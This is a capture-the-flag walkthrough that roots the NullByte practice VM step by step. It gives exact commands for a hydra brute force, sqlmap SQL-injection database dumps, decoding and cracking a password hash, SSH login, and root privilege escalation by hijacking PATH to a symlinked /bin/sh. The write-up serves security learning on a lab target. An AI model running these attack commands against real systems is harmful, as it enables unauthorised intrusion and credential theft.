Download VM here.

Run it on virtualbox, and let’s get started.

0. Get VM’s IP:

  • $ nmap -sn 192.168.1.0/24
    our machine’s ip » 192.168.1.142
    our machine’s ip » 192.168.1.142

1. Enumeration:

Now we can continue to scan the machine and the running services.

  • Using Zenmap (GUI nmap) : $ nmap -T4 -A -v 192.168.1.142

As you can see there are :

  • Apache server running on port 80
  • rpcbind on port 111
  • ssh on port 777

2. Web Enumeration:

  • let’s see the web app running on apache

  • let’s discover any directories using dirbuster » found nothing usefull

  • let’s inspect and check the picture in the page, maybe something hidden.

    • download it :
      it’s a gif
      it’s a gif

  • using strings command or exiftool » got this string kzMb5nVYJw

let’s try openning that string as a directory:

  • got this page with login function and needs a key

From it’s source code it seems that the key isn’t that hard and we can brute force it

So let’s use hydra for that job and you could use burpsuite’s intruder too.

usage : hydra -l <USER> -p <Password> <IP Address> http-post-form “<Login Page>:<Request Body>:<Error Message>”
$ hydra 192.168.1.142 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -P /home/sehs/Desktop/stuff/rockyou.txt -la

we got the password » elite

Now let’s login and see

It’s a search function, by typing any letters or just enter » you get this:

some names from a database
some names from a database

3. Exploitation:

  • let’s check this database and see what we could get, using sqlmap tool:

$ sqlmap -u http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch= --dbs

And we got these databases.

  • let’s discover them:
    • mysql

$ sqlmap -u http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch=a --batch --dump -C User,Password -T user -D mysql

nothing useful here
nothing useful here

  • seth

$ sqlmap -u http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch= --dump --columns --tables -D seth

ramses’ password looks interesting YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE

  • let’s decrypt it as base64 :
    • $ echo YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE= | base64 -d
    • we got this md5 hash : c6d6bd7ebf806f43c76acc3681703b81 cracking it online gives » omega

Getting back to the ssh service running

  • let’s try this user and his password and see if it works
    • $ ssh ramses@192.168.1.142 -p 777
    • password: omega
  • notice it’s runnig on port 777 not it’s default 22

And yeah we got a connection..

let’s see our privileges here » just a user not root

let’s roam into the system and see what we could find

we could read his bash history » and here he had executed this file procwatch in this path /var/www/backup

  • so let’s go there and see
  • This file is just running ps command (process status) to display the running processes inside a shell (sh)..
    • So we have an executable, that’s running ps as root and ps is really just a file in /bin, and $PATH sets the directories.

Where executables located:

Then we could manipulate this environment variables and get procwatch to run sh instead of ps, and this should give us a root shell :D

ramses@NullByte:/var/www/backup$ ln -snf /bin/sh ps
ramses@NullByte:/var/www/backup$ export PATH="/var/www/backup:$PATH"

This ln command creates a symlink to sh called ps followed by setting up the path to the current directory which gave us a shell :D

Got root access :) , opening /root/proof.txt » gave us the flag and we are done here…

  • hope you enjoyed…